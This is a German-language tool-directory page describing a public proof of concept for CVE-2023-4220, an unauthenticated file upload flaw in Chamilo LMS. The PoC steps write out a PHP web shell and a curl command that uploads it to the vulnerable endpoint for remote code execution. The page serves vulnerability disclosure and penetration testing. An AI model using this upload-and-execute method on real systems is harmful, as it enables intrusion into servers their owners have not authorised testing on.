Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — Ein uneingeschränkter Datei-Upload in der Funktion zum Hochladen großer Dateien in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 ermöglicht nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und über das Hochladen einer Web-Shell Remote-Codeausführung zu erlangen. | Kitploit
Tools/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
Webseite
1vor 2 JahrenNoch nicht geprüft

Ein uneingeschränkter Datei-Upload in der Funktion zum Hochladen großer Dateien in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 ermöglicht nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und über das Hochladen einer Web-Shell Remote-Codeausführung zu erlangen.

Teilen

Chamilo-LMS-Unauthenticated-File-Upload-

Uneingeschränkter Datei-Upload in der Big-File-Upload-Funktionalität in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 erlaubt nicht authentifizierten Angreifern, gespeicherte Cross-Site-Scripting-Angriffe durchzuführen und Remote-Codeausführung durch das Hochladen einer Web-Shell zu erlangen.

Betroffene Version ≤v1.11.24

CVE-Kennung CVE-2023-4220

Zusammenfassung der Schwachstelle

Die Big-File-Upload-Funktionalität von /main/inc/lib/javascript/bigupload/inc/bigUpload.php erlaubt das Hochladen beliebiger Dateien in das Verzeichnis /main/inc/lib/javascript/bigupload/files innerhalb des Web-Roots.

Proof-of-Concept

  • Falls das Verzeichnis /main/inc/lib/javascript/bigupload/files existiert, können wir eine beliebige Datei wie folgt hochladen:

  • Erstelle eine schädliche PHP-Datei echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Wir können diese Datei dann mit dem folgenden Befehl hochladen:

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Wir können überprüfen, ob unsere Datei hochgeladen wurde, indem wir das Verzeichnis /main/inc/lib/javascript/bigupload/files aufrufen. Untitled (1).png

  • Und wir können sie ausführen, indem wir auf die PHP-Datei klicken, was die Ausgabe des Befehls whoami liefert. Untitled (1).png

Tool herunterladen